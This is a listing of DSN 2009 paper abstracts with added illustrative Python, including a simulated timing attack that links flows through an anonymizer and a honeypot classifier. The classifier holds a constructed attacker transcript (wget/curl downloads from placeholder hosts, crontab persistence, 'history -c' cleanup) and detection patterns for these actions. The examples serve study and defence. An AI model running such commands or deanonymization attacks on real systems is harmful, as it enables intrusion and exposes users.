
2009 IEEE/IFIP International Conference on Dependable Systems & Networks: latest papers

On the effectiveness of low latency anonymous network in the presence of timing attack
Pub Date : 2009-09-29 DOI: 10.1109/DSN.2009.5270306
Jinghe Jin, Xinyuan Wang
In this paper, we introduce a novel metric that can quantitatively measure the practical effectiveness (i.e. anonymity) of all anonymous networks in the presence of timing attack. Our metric is based on a novel measurement of the distortion of the packet timing between the incoming and the outgoing flows to and from the anonymous network and it uses wavelet based analysis to measure the variability of the distortion. To the best of our knowledge, our approach is the first practical method that can quantitatively measure the packet timing distortion between flows that may have gone through such transformations as flow mixing/splitting/merging, adding chaff, packet dropping. To validate our anonymity metric, we have conducted real-time timing attacks on various deployed anonymous networks such as Tor, anonymizer.com and have used the timing attack results as the ground truth for validating our anonymity metric. We have found strong correlation between our anonymity metric and the timing attack results. Our metric measurements and timing attack results show that the circuit rotation in Tor network could significantly increase its resistance to timing attack at the cost of more timing disturbances to the normal users. In addition, we have found that adding constant rate chaff (i.e. cover traffic) has diminishing effect in anonymizing packet flows.
Citations: 15
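Added example, not code from the paper above and not the authors' metric: a toy flow-correlation timing attack in Python that shows why the abstract's last finding holds. Incoming flows are pushed through a simulated relay that adds delay jitter, drops packets and mixes in constant-rate chaff; the attacker bins packet counts per time window and links each incoming flow to the outgoing flow with the highest Pearson correlation. Because constant-rate chaff adds roughly the same count to every window, and Pearson correlation is invariant to an additive offset, the cover traffic barely hurts the attacker. All flows, parameters and the relay model are constructed for this example.

```python
import math
import random

def make_flow(rng, n_packets, mean_gap):
    """Constructed client flow: packet timestamps with exponential inter-packet gaps."""
    t, stamps = 0.0, []
    for _ in range(n_packets):
        t += rng.expovariate(1.0 / mean_gap)
        stamps.append(t)
    return stamps

def relay(rng, flow, jitter, drop_prob, chaff_rate, duration):
    """Toy low-latency anonymizer: adds per-packet delay jitter, drops packets at
    random and mixes in constant-rate chaff (cover traffic). Returns the outgoing
    timestamps an attacker can observe on the far side of the relay."""
    out = [t + abs(rng.gauss(0.0, jitter)) for t in flow if rng.random() >= drop_prob]
    if chaff_rate > 0:
        gap = 1.0 / chaff_rate
        out += [k * gap for k in range(int(duration / gap))]
    return sorted(out)

def bin_counts(stamps, bin_width, n_bins):
    """Packet count per time window: the timing signal the attacker correlates."""
    counts = [0] * n_bins
    for t in stamps:
        i = int(t / bin_width)
        if i < n_bins:
            counts[i] += 1
    return counts

def pearson(a, b):
    n = len(a)
    mean_a, mean_b = sum(a) / n, sum(b) / n
    cov = sum((x - mean_a) * (y - mean_b) for x, y in zip(a, b))
    sd_a = math.sqrt(sum((x - mean_a) ** 2 for x in a))
    sd_b = math.sqrt(sum((y - mean_b) ** 2 for y in b))
    return cov / (sd_a * sd_b) if sd_a and sd_b else 0.0

def match_flows(incoming, outgoing, bin_width, n_bins):
    """Attacker: pair every incoming flow with the outgoing flow whose windowed
    packet counts correlate best. Returns the chosen outgoing index per incoming flow."""
    out_counts = [bin_counts(f, bin_width, n_bins) for f in outgoing]
    choices = []
    for f in incoming:
        in_counts = bin_counts(f, bin_width, n_bins)
        choices.append(max(range(len(outgoing)),
                           key=lambda j: pearson(in_counts, out_counts[j])))
    return choices

def attack_accuracy(n_flows=5, n_packets=400, mean_gap=0.05, jitter=0.02,
                    drop_prob=0.1, chaff_rate=0.0, bin_width=0.5, seed=7):
    """Fraction of incoming flows the attacker links to the correct outgoing flow.
    Every parameter is an assumption of this simulation, not a value from the paper."""
    rng = random.Random(seed)
    duration = n_packets * mean_gap
    n_bins = int(duration / bin_width)
    incoming = [make_flow(rng, n_packets, mean_gap) for _ in range(n_flows)]
    outgoing = [relay(rng, f, jitter, drop_prob, chaff_rate, duration) for f in incoming]
    guesses = match_flows(incoming, outgoing, bin_width, n_bins)
    return sum(1 for i, j in enumerate(guesses) if i == j) / n_flows

if __name__ == "__main__":
    print("jitter + 10% drop:           ", attack_accuracy())
    print("plus 20 pkt/s constant chaff:", attack_accuracy(chaff_rate=20.0))
    print("heavy jitter (2 s):          ", attack_accuracy(jitter=2.0))
```

With jitter far below the window width the attacker links every flow correctly, with or without constant-rate chaff; only timing distortion on the order of the window (large jitter, or the kind of circuit changes the abstract credits to Tor's circuit rotation) degrades the match.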
Design and development of a proof-of-concept platooning application using the HIDENETS architecture
Pub Date : 2009-09-29 DOI: 10.1109/DSN.2009.5270334
Luis Marques, A. Casimiro, M. Calha
This paper describes the design and development of a proof-of-concept platooning application, which operates in a mobile and dynamic environment and makes use of architectural and middleware solutions that were proposed in the scope of the HIDENETS project. With this application it is possible to demonstrate the practical feasibility of a hybrid system architecture, with realms of operation with distinct synchrony properties, and the benefits of adopting such architecture. In particular, we show that it is possible to improve the performance and behavior of the platooning application, which operates over an intrinsically uncertain environment (due to mobility and wireless communication), and still secure fundamental safety-critical requirements.
Citations: 6
WYSIWIB: A declarative approach to finding API protocols and bugs in Linux code
Pub Date : 2009-09-29 DOI: 10.1109/DSN.2009.5270354
J. Lawall, Julien Brunel, Nicolas Palix, René Rydhof Hansen, H. Stuart, Gilles Muller
Eliminating OS bugs is essential to ensuring the reliability of infrastructures ranging from embedded systems to servers. Several tools based on static analysis have been proposed for finding bugs in OS code. They have, however, emphasized scalability over usability, making it difficult to focus the tools on specific kinds of bugs and to relate the results to patterns in the source code. We propose a declarative approach to bug finding in Linux OS code using a control-flow based program search engine. Our approach is WYSIWIB (What You See Is Where It Bugs), since the programmer expresses specifications for bug finding using a syntax close to that of ordinary C code. The key advantage of our approach is that search specifications can be easily tailored, to eliminate false positives or catch more bugs. We present three case studies that have allowed us to find hundreds of potential bugs.
Citations: 64
Fail-Aware Untrusted Storage
Pub Date : 2009-09-29 DOI: 10.1137/090751062
C. Cachin, I. Keidar, A. Shraer
We consider a set of clients collaborating through an online service provider that is subject to attacks, and hence not fully trusted by the clients. We introduce the abstraction of a fail-aware untrusted service, with meaningful semantics even when the provider is faulty. In the common case, when the provider is correct, such a service guarantees consistency (linearizability) and liveness (wait-freedom) of all operations. In addition, the service always provides accurate and complete consistency and failure detection. We illustrate our new abstraction by presenting a Fail-Aware Untrusted STorage service (FAUST). Existing storage protocols in this model guarantee so-called forking semantics. We observe, however, that none of the previously suggested protocols suffice for implementing fail-aware untrusted storage with the desired liveness and consistency properties (at least wait-freedom and linearizability when the server is correct). We present a new storage protocol, which does not suffer from this limitation, and implements a new consistency notion, called weak fork-linearizability. We show how to extend this protocol to provide eventual consistency and failure awareness in FAUST.
Citations: 59
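Added example, not the FAUST protocol and not the authors' code: a simplified Python illustration of the forking semantics the abstract refers to. Clients keep a hash chain over the history they have verified, so a provider that drops, reorders or alters entries is caught immediately; what an isolated client cannot catch is a "forking" provider that shows each client its own consistent history, and that is exposed only when two clients compare their views out of band and find that neither is a prefix of the other. Assumptions of this example: a single HMAC key shared by all clients (a stand-in for per-client signatures), an in-memory server, and sequential operations.

```python
import hashlib
import hmac
import json

GROUP_KEY = b"constructed-shared-client-key"  # assumption: clients share a MAC key the server never sees

def canonical(obj):
    return json.dumps(obj, sort_keys=True).encode()

def entry_hash(entry):
    return hashlib.sha256(canonical(entry)).hexdigest()

class UntrustedServer:
    """Storage provider. Honest mode keeps one history; forking mode silently keeps a
    separate history per client, which is exactly the attack forking semantics expose."""
    def __init__(self, forking=False):
        self.forking = forking
        self.history = []
        self.per_client = {}

    def _history(self, client_id):
        if self.forking:
            return self.per_client.setdefault(client_id, [])
        return self.history

    def get_history(self, client_id):
        return list(self._history(client_id))

    def put(self, client_id, entry):
        self._history(client_id).append(entry)

class Client:
    def __init__(self, client_id, server):
        self.id, self.server = client_id, server
        self.seen = []  # hashes of the history entries this client has verified, in order

    def _mac(self, body):
        return hmac.new(GROUP_KEY, canonical(body), "sha256").hexdigest()

    def _verify(self, history):
        """Reject histories that drop, reorder or alter entries this client already saw,
        break the hash chain, or contain entries no authorized client produced."""
        hashes = [entry_hash(e) for e in history]
        if hashes[: len(self.seen)] != self.seen:
            raise RuntimeError(f"{self.id}: server rewrote a history prefix already observed")
        for i, e in enumerate(history):
            body = {k: v for k, v in e.items() if k != "mac"}
            if not hmac.compare_digest(e["mac"], self._mac(body)):
                raise RuntimeError(f"{self.id}: entry {i} has a bad MAC")
            expected_prev = hashes[i - 1] if i > 0 else None
            if e["prev"] != expected_prev:
                raise RuntimeError(f"{self.id}: hash chain broken at entry {i}")
        self.seen = hashes

    def write(self, key, value):
        self._verify(self.server.get_history(self.id))
        body = {"writer": self.id, "key": key, "value": value,
                "prev": self.seen[-1] if self.seen else None}
        entry = {**body, "mac": self._mac(body)}
        self.server.put(self.id, entry)
        self.seen.append(entry_hash(entry))

    def read(self, key):
        history = self.server.get_history(self.id)
        self._verify(history)
        for e in reversed(history):
            if e["key"] == key:
                return e["value"]
        return None

def views_consistent(seen_a, seen_b):
    """Out-of-band check between two clients: one verified history must be a prefix
    of the other. If neither is, the server has forked the two clients."""
    shorter, longer = sorted((seen_a, seen_b), key=len)
    return longer[: len(shorter)] == shorter

def scenario(forking):
    """Returns (value A reads for 'x', fork detected?) against an honest or forking server."""
    server = UntrustedServer(forking=forking)
    a, b = Client("A", server), Client("B", server)
    a.write("x", 1)
    b.write("x", 2)
    value = a.read("x")
    return value, not views_consistent(a.seen, b.seen)

def tamper_detected():
    """Honest-looking server that later alters a stored value behind the client's back."""
    server = UntrustedServer()
    a = Client("A", server)
    a.write("x", 1)
    server.history[0]["value"] = 99
    try:
        a.read("x")
    except RuntimeError:
        return True
    return False
```

Against the honest server A reads B's later write and both views agree; against the forking server A keeps reading its own stale value without any local check failing, and only the cross-client prefix comparison reveals the fork. Detecting a fork after the fact is what the abstract's "failure detection" adds on top of the per-client consistency checks.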
Sharing end-user negative symptoms for improving overlay network dependability
Pub Date : 2009-09-29 DOI: 10.1109/DSN.2009.5270328
Yongning Tang, E. Al-Shaer
The dependability of overlay services relies on the overlay network's capability to effectively diagnose and recover from faults (e.g., link failures, overlay node outages). However, overlay applications bring new challenges to overlay fault diagnosis, including large-scale deployment, inaccessible underlying network information, dynamic symptom-fault causality relationships, and multi-layer complexity. In this paper, we develop an evidential overlay fault diagnosis framework (called DigOver) to tackle these challenges. First, DigOver identifies a set of potential faulty components based on shared end-user observed negative symptoms. Then, each potential faulty component is evaluated to quantify its fault likelihood and the corresponding evaluation uncertainty. Finally, DigOver dynamically constructs a plausible fault graph to locate the root causes of end-user observed negative symptoms.
Citations: 8
Language level checkpointing support for stream processing applications
Pub Date : 2009-09-29 DOI: 10.1109/DSN.2009.5270344
Gabriela Jacques-Silva, B. Gedik, H. Andrade, Kun-Lung Wu
Many streaming applications demand continuous processing of live data with little or no downtime, therefore making high availability a crucial operational requirement. Fault tolerance techniques are generally expensive and when directly applied to streaming systems with stringent throughput and latency requirements, they might incur a prohibitive performance overhead. This paper describes a flexible, light-weight fault tolerance solution in the context of the SPADE language and the System S distributed stream processing engine. We devised language extensions so users can define and parameterize checkpoint policies easily. This configurable fault tolerance solution is implemented through code generation in SPADE, which reduces the overall application fault tolerance costs by incurring them only for the parts of the application that require it. In this paper we focus on the overall design of our checkpoint mechanism and we also describe an incremental checkpointing algorithm that is suitable for on-the-fly processing of high-rate data streams.
Citations: 25
Analyzing the process of installing rogue software
Pub Date : 2009-09-29 DOI: 10.1109/DSN.2009.5270293
R. Berthier, Jorge Arjona, M. Cukier
This practical experience report presents the results of an experiment aimed at understanding the sequence of malicious actions following a remote compromise. The type of rogue software installed during attacks was used to classify and understand sequences of malicious actions. For this experiment, we used four Linux target computers running SSH with simple passwords. During the eight-month data collection period, we recorded a total of 1,171 attack sessions. In these sessions, attackers typed a total of 20,335 commands that we categorized into 24 specific actions. These actions were analyzed based on the type of rogue software installed by attackers.
Citations: 10
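Added example, not from the report above and not its 24-action taxonomy: a small Python classifier of the kind used to turn SSH honeypot command transcripts into sequences of attacker actions. The transcript is constructed for this example (hosts use RFC 5737 documentation addresses), and the seven categories and the regular expressions are this example's own; the point is the per-session action sequence, which is what the report's analysis works from.

```python
import re
from collections import Counter, defaultdict

# Constructed honeypot transcript: "<session-id> <command typed by the attacker>".
# Not real capture data; the hosts are RFC 5737 documentation addresses.
SESSIONS = """\
s1 w
s1 uname -a
s1 wget http://198.51.100.7/x.tgz
s1 tar xzf x.tgz
s1 cd x; ./install
s1 crontab -e
s1 rm -rf x.tgz; history -c
s2 cat /proc/cpuinfo
s2 curl -O http://203.0.113.5/scan.tar.gz
s2 tar xzf scan.tar.gz
s2 ./scan 10.0.0.0/8
"""

# Ordered (category, pattern) pairs; the first match wins. The categories are this
# example's own simplification, not the 24 actions of the report.
ACTION_PATTERNS = [
    ("recon",    re.compile(r"^(w|who|uname|id|cat /proc/cpuinfo|ps|ifconfig|last)\b")),
    ("download", re.compile(r"\b(wget|curl|ftp|scp|tftp)\b")),
    ("unpack",   re.compile(r"\b(tar|unzip|gunzip|bunzip2)\b")),
    ("install",  re.compile(r"(\./install|\./setup|\./configure|\bmake\b)")),
    ("persist",  re.compile(r"(crontab|rc\.local|\.bashrc|useradd|authorized_keys)")),
    ("cleanup",  re.compile(r"(rm -rf|history -c|unset HISTFILE)")),
    ("scan",     re.compile(r"(\./scan|\bnmap\b|\bmasscan\b)")),
]

def classify(command):
    """Map one typed command line to an action category."""
    for category, pattern in ACTION_PATTERNS:
        if pattern.search(command):
            return category
    return "other"

def session_sequences(transcript):
    """Map each session id to the ordered list of action categories observed."""
    sequences = defaultdict(list)
    for line in transcript.splitlines():
        if not line.strip():
            continue
        session_id, command = line.split(" ", 1)
        sequences[session_id].append(classify(command))
    return dict(sequences)

def category_counts(transcript):
    """How often each action category occurs across all sessions."""
    return Counter(c for seq in session_sequences(transcript).values() for c in seq)

def fetches_then_hides(sequence):
    """Flag the classic rogue-software pattern: something was downloaded and the
    attacker later tried to cover tracks."""
    return ("download" in sequence and "cleanup" in sequence
            and sequence.index("download") < sequence.index("cleanup"))

if __name__ == "__main__":
    for sid, seq in session_sequences(SESSIONS).items():
        print(sid, "->", " > ".join(seq), "(cover-up)" if fetches_then_hides(seq) else "")
    print(category_counts(SESSIONS))
```

Session s1 reads as reconnaissance, fetch, unpack, install, persistence, cleanup, which is the typical install-and-hide sequence; s2 is a scanner deployment with no cover-up. On real transcripts the "other" bucket is where new attacker tooling first shows up, so it is worth reviewing by hand rather than discarding.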
Exploiting refactoring in formal verification
Pub Date : 2009-09-29 DOI: 10.1109/DSN.2009.5270355
Xiang Yin, J. Knight, Westley Weimer
In previous work, we introduced Echo, a new approach to the formal verification of the functional correctness of software. Part of what makes Echo practical is a technique called verification refactoring. The program to be verified is mechanically refactored specifically to facilitate verification. After refactoring, the program is documented with low-level annotations, and a specification is extracted mechanically. Proofs that the semantics of the refactored program are equivalent to those of the original program, that the code conforms to the annotations, and that the extracted specification implies the program's original specification constitute the verification argument. In this paper, we discuss verification refactoring and illustrate it with a case study of the verification of an optimized implementation of the Advanced Encryption Standard (AES) against its official specification. We compare the practicality of verification using refactoring with traditional correctness proofs and refinement, and we assess its efficacy using seeded defects.
Citations: 25
RRE: A game-theoretic intrusion Response and Recovery Engine
Pub Date : 2009-06-01 DOI: 10.1109/DSN.2009.5270307
Saman A. Zonouz, Himanshu Khurana, William H. Sanders, Timothy M. Yardley
Preserving the availability and integrity of networked computing systems in the face of fast-spreading intrusions requires advances not only in detection algorithms, but also in automated response techniques. In this paper, we propose a new approach to automated response called the Response and Recovery Engine (RRE). Our engine employs a game-theoretic response strategy against adversaries modeled as opponents in a two-player Stackelberg stochastic game. RRE applies attack-response trees to analyze undesired security events and their countermeasures using Boolean logic to combine lower-level attack consequences. In addition, RRE accounts for uncertainties in intrusion detection alert notifications. RRE then chooses optimal response actions by solving a partially observable competitive Markov decision process that is automatically derived from attack-response trees. Experimental results show that RRE, using Snort's alerts, can protect large networks for which attack-response trees have more than 900 nodes.
Citations: 26
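Added example, not RRE's code and not its game-theoretic solver: a Python sketch of the attack-response-tree idea the abstract describes. Leaves carry the probability that an event really happened (derived from IDS alert confidence, which is where the "uncertainty in alert notifications" enters), inner nodes combine children with Boolean AND/OR, and each response action neutralises some leaves at a cost. Where the paper solves a partially observable competitive Markov decision process, this example only does a one-step choice that minimises action cost plus expected damage, and it assumes leaf events are independent. The tree, responses, costs and probabilities are constructed for the example.

```python
from dataclasses import dataclass, field

@dataclass
class Node:
    """Attack-response tree node. Leaves hold P(event occurred) from alert confidence;
    inner nodes combine their children with Boolean AND / OR."""
    name: str
    op: str = "leaf"          # "leaf", "and" or "or"
    prob: float = 0.0
    children: list = field(default_factory=list)

def compromise_prob(node, cleared=frozenset()):
    """P(the node's consequence holds), treating leaf events as independent (a
    simplifying assumption of this example). Leaves in `cleared` have been
    neutralised by a response action."""
    if node.op == "leaf":
        return 0.0 if node.name in cleared else node.prob
    probs = [compromise_prob(c, cleared) for c in node.children]
    if node.op == "and":
        result = 1.0
        for p in probs:
            result *= p
        return result
    none_happen = 1.0
    for p in probs:
        none_happen *= 1.0 - p
    return 1.0 - none_happen

def choose_response(tree, responses, damage):
    """One-step response selection: minimise action cost plus the expected damage
    from whatever attack paths the action leaves open."""
    scored = {name: cost + damage * compromise_prob(tree, frozenset(clears))
              for name, (cost, clears) in responses.items()}
    best = min(scored, key=scored.get)
    return best, scored[best]

# Constructed tree: the database host is compromised either through an SSH brute force
# that succeeded and was followed by privilege escalation, or through a web RCE.
TREE = Node("db_host_compromised", "or", children=[
    Node("ssh_path", "and", children=[
        Node("ssh_bruteforce_success", prob=0.6),  # alert confidence, not certainty
        Node("privilege_escalation", prob=0.5),
    ]),
    Node("web_rce", prob=0.2),
])

# response name -> (cost of taking it, leaf events it neutralises); all constructed
RESPONSES = {
    "do_nothing": (0.0, []),
    "block_ssh_source": (2.0, ["ssh_bruteforce_success"]),
    "patch_web_app": (5.0, ["web_rce"]),
    "isolate_host": (15.0, ["ssh_bruteforce_success", "privilege_escalation", "web_rce"]),
}
DAMAGE = 50.0  # assumed loss if the root consequence materialises

if __name__ == "__main__":
    print("P(root) with no response:", round(compromise_prob(TREE), 3))
    print("chosen response:", choose_response(TREE, RESPONSES, DAMAGE))
```

With these numbers the root is compromised with probability 0.44 if nothing is done; blocking the SSH source cuts that to 0.2 at the lowest total cost, so it beats both doing nothing and the expensive host isolation. Raising the web RCE alert's confidence or the damage estimate shifts the choice, which is the kind of sensitivity an automated responder has to be tuned against before it is allowed to act unattended.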
Fluid modeling and control for server system performance and availability
Pub Date : 2009-06-01 DOI: 10.1109/DSN.2009.5270311
Luc Malrait, S. Bouchenak, N. Marchand
Although server technology provides a means to support a wide range of online services and applications, their ad-hoc configuration poses significant challenges to the performance, availability and economic costs of applications. In this paper, we examine the impact of server configuration on the central tradeoff between service performance and availability. First, we present a server model as a nonlinear continuous-time model using fluid approximations. Second, we develop admission control of server systems for an optimal configuration. We provide two control laws for two different QoS objectives. AM-C is an availability-maximizing admission control that achieves the highest service availability given a fixed performance constraint; and PM-C is a performance-maximizing admission control that meets a desired availability target with the highest performance. We evaluate our fluid model and control techniques on the TPC-C industry-standard benchmark. Our experiments show that the proposed techniques improve performance by up to 30% while guaranteeing availability constraints.
Citations: 14